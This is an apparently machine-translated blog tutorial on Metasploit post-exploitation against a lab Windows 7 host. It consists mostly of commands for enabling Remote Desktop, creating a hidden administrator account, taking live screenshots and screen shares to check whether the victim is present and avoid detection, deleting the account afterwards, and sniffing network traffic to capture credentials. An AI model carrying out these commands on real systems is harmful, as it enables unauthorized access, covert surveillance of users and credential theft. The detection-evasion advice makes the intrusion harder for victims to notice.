Catalog

Metasploit Intranet information collection

05 Open and connect 3389

06 Packet capture

Intranet information collection of Intranet penetration （ 3、 ... and ）_ Unknown white hat blog -CSDN Blog

Metasploit Intranet information collection

attack kali 192.168.0.103

Drone aircraft win7 192.168.0.105

05 Open and connect 3389

see 3389 Port opening

Turn on 3389 Remote desktop

run post/windows/manage/enable_rdp

run getgui -e

You can use this command to add users on the target machine ：

run getgui -u admin -p [email protected]（ Some system passwords have to meet the complexity to create ）

net localgroup administrators admin /add（ take admin Users are added to the administrators group ）

Remote connection to desktop

rdesktop -u username -p password ip

yes And then it's going to pop up GUI page （ If the user is not added to the administrator group, you cannot log in ）

After logging in, you will be prompted to close win7（ So we should observe whether the target plane is used in advance , In order to avoid being perceived by users to be attacked ）

View remote desktop

screenshot（ Intercept win7 Current screen , Check whether someone is using ）

use espia

screengrab

screenshare（ Get... In real time win7 The screen , Similar to the video style open in the browser ）

Delete the specified account

run post/windows/manage/delete_user USERNAME=admin

06 Packet capture

Grab the bag

Load sniffer

Sniffer_interfaces

Sniffer_start 2

Sniffer_dump 2 1.cap

decode

Use auxiliary/sniffer/psnuffle

Set PCAPFILE 1.cap

exploit